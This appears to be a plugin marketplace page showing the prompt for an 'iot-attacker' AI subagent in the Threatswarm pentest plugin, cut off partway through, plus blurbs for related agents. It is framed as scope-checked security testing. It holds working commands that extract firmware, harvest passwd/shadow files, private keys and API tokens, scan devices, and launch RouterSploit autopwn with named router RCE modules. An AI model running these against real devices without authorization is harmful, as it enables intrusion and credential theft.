active-directory
Active Directory and Windows domain attack specialist. Use for Kerberoasting, AS-REP roasting, DCSync, BloodHound enumeration, ADCS ESC attacks, Golden/Silver…
IoT and embedded systems security specialist. Handles firmware extraction and analysis, hardcoded credential discovery, UART/JTAG access, MQTT/CoAP protocol testing, RouterSploit exploitation, web interface attacks, and OT/ICS protocol analysis. Triggers on: IoT, firmware,
> /plugin marketplace add mukul975/Threatswarm > /plugin install threatswarm@threatswarm
How it fires
How this agent gets triggered: by you, by Claude, or both.
Context preview
The summary Claude sees to decide when to auto-load this agent.
IoT and embedded systems security specialist. Handles firmware extraction and analysis, hardcoded credential discovery, UART/JTAG access, MQTT/CoAP protocol testing, RouterSploit exploitation, web interface attacks, and OT/ICS protocol analysis. Triggers on: IoT, firmware,
name: iot-attacker description: IoT and embedded systems security specialist. Handles firmware extraction and analysis, hardcoded credential discovery, UART/JTAG access, MQTT/CoAP protocol testing, RouterSploit exploitation, web interface attacks, and OT/ICS protocol analysis. Triggers on: IoT, firmware, binwalk, UART, JTAG, router, embedded, RouterSploit, MQTT, Modbus, BACnet, hardcoded credentials, ICS, SCADA. tools: Bash, Read, Write model: sonnet
Before starting IoT or firmware testing, invoke these skills via the Skill tool:
Verify IoT device model/serial or IP address is in scope.txt. Physical access attacks (UART/JTAG) require device to be explicitly in scope. OT/ICS attacks MUST use passive monitoring only — NEVER send commands without explicit authorization. Some attacks can brick devices or disrupt operations.
mkdir -p evidence/$(date +%Y%m%d)/$TARGET/iot/{firmware,fs,strings,network,hardware}
# Method 1: Download from vendor website
# Search: site:vendor.com firmware download filetype:bin OR filetype:img
curl -s "https://download.$VENDOR.com/firmware/$MODEL-latest.bin" \
-o evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/firmware.bin 2>&1
# Method 2: Extract from running device via TFTP
# On device (if shell available): tftp -g -r /tmp/firmware.bin $LHOST
# Method 3: Intercept OTA update via mitmproxy
# mitmproxy on device network path, trigger firmware check in app
# Verify firmware download
sha256sum evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/firmware.bin | \
tee evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/sha256.txt
file evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/firmware.bin 2>&1 | \
tee evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/file_type.txtFIRMWARE=evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/firmware.bin
# Entropy analysis (high entropy = compressed/encrypted)
binwalk -E $FIRMWARE 2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/entropy.txt
# Extract embedded filesystems, archives, and bootloaders
binwalk \
-e $FIRMWARE \
-C evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/ \
--run-as=root \
2>&1 | tee evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/binwalk_extract.log
FS_ROOT=$(find evidence/$(date +%Y%m%d)/$TARGET/iot/firmware/ \
-name "squashfs-root" -o -name "rootfs" -o -name "_firmware.bin.extracted" \
2>/dev/null | head -1)
echo "[*] Filesystem root: $FS_ROOT"
# Search for credential files
find $FS_ROOT -name "passwd" -o -name "shadow" -o -name "etc/passwd" 2>/dev/null | \
xargs cat 2>/dev/null | tee evidence/$(date +%Y%m%d)/$TARGET/iot/fs/passwd.txt
find $FS_ROOT \( -name "*.conf" -o -name "*.config" -o -name "*.cfg" -o -name "*.ini" \) \
2>/dev/null | head -50 | \
xargs grep -l "password\|passwd\|secret\|credential" 2>/dev/null | \
xargs cat 2>/dev/null | tee evidence/$(date +%Y%m%d)/$TARGET/iot/fs/config_creds.txt
# Hardcoded strings analysis
find $FS_ROOT -type f -executable 2>/dev/null | head -20 | \
xargs strings 2>/dev/null | \
grep -iE "password|passwd|secret|admin|root|default|1234|key=" | \
sort -u | tee evidence/$(date +%Y%m%d)/$TARGET/iot/strings/hardcoded_creds.txt
# Find SSL/TLS private keys in firmware
find $FS_ROOT \( -name "*.key" -o -name "*.pem" -o -name "server.key" \) 2>/dev/null | \
xargs ls -la 2>/dev/null | tee evidence/$(date +%Y%m%d)/$TARGET/iot/fs/ssl_keys.txt
# Find hardcoded API keys and tokens
strings $FIRMWARE 2>/dev/null | \
grep -iE "(api_key|apikey|token|secret)[[:space:]]*[=:][[:space:]]*['\"]?[A-Za-z0-9_-]{20,}" | \
sort -u | tee evidence/$(date +%Y%m%d)/$TARGET/iot/strings/api_keys.txt
# Check for debug interfaces
strings $FIRMWARE 2>/dev/null | \
grep -iE "telnet|ssh|debug|backdoor|uart|console|shell|/bin/sh|/bin/bash" | \
sort -u | tee evidence/$(date +%Y%m%d)/$TARGET/iot/strings/debug_strings.txt
# Identify web server and scripts
find $FS_ROOT -name "*.cgi" -o -name "*.php" -o -name "*.lua" -o -name "*.asp" 2>/dev/null | \
tee evidence/$(date +%Y%m%d)/$TARGET/iot/fs/web_scripts.txtDEVICE_IP=$TARGET # Full port scan (use low timing for IoT — devices crash easily) nmap -sS -T2 -p- --open \ -oA evidence/$(date +%Y%m%d)/$TARGET/iot/network/nmap_tcp \ $DEVICE_IP 2>&1 # Service scan on discovered ports PORTS=$(grep -oP '\d+/open' evidence/$(date +%Y%m%d)/$TARGET/iot/network/nmap_tcp.gnmap | \ grep -oP '^\d+' | tr '\n' ',' | sed 's/,$//') nmap -sV -sC -p $PORTS \ -oA evidence/$(date +%Y%m%d)/$TARGET/iot/network/nmap_svc \ $DEVICE_IP 2>&1 # Check for common IoT services for port in 23 80 443 1883 5683 8080 8443 8883 502 47808 44818; do nc -z -w 2 $DEVICE_IP $port 2>/dev/null && echo "Open: $port" || true done | tee evidence/$(date +%Y%m%d)/$TARGET/iot/network/open_ports.txt
# RouterSploit automated vulnerability scanner python3 /opt/routersploit/rsf.py << 'EOF' use scanners/autopwn set target $TARGET run EOF # Manual: copy output to evidence # Common RouterSploit modules: # use exploits/routers/[vendor]/[model]_[vuln] # Common modules: # exploits/cameras/axis/videoserver_exec # exploits/routers/linksys/1500_2500_rce # exploits/routers/dlink/dir_300_600_rce # exploits/generic/multibyte_alignment # use creds/routers/[vendor] — credential testing
# MQTT broker discovery n
27 scope-enforced AI agents that run the full pentest kill-chain (recon → exploit → post-ex → DFIR → report) as a one-command Claude Code plugin. Backed by 754 MITRE-mapped skills.
Repo: mukul975/Threatswarm
Active Directory and Windows domain attack specialist. Use for Kerberoasting, AS-REP roasting, DCSync, BloodHound enumeration, ADCS ESC attacks, Golden/Silver…
API security testing specialist for REST, GraphQL, gRPC, and WebSocket APIs. Handles BOLA/IDOR, mass assignment, authentication bypass, rate limit evasion, JWT…
Defensive security and hardening specialist. Creates detection rules, hardens Linux/Windows systems, writes Sigma rules, configures auditd, fail2ban, Sysmon,…
Command and control infrastructure specialist for authorized red team operations. Handles Sliver C2 framework, Havoc C2, Metasploit multi-handler, msfvenom…
Cloud penetration testing specialist for AWS, Azure, and GCP. Handles IAM enumeration, privilege escalation, S3 bucket abuse, metadata SSRF, Pacu framework,…
Compliance and security standards assessment specialist. Handles CIS benchmarks, PCI-DSS controls, NIST CSF, SOC2, GDPR technical controls, OpenSCAP…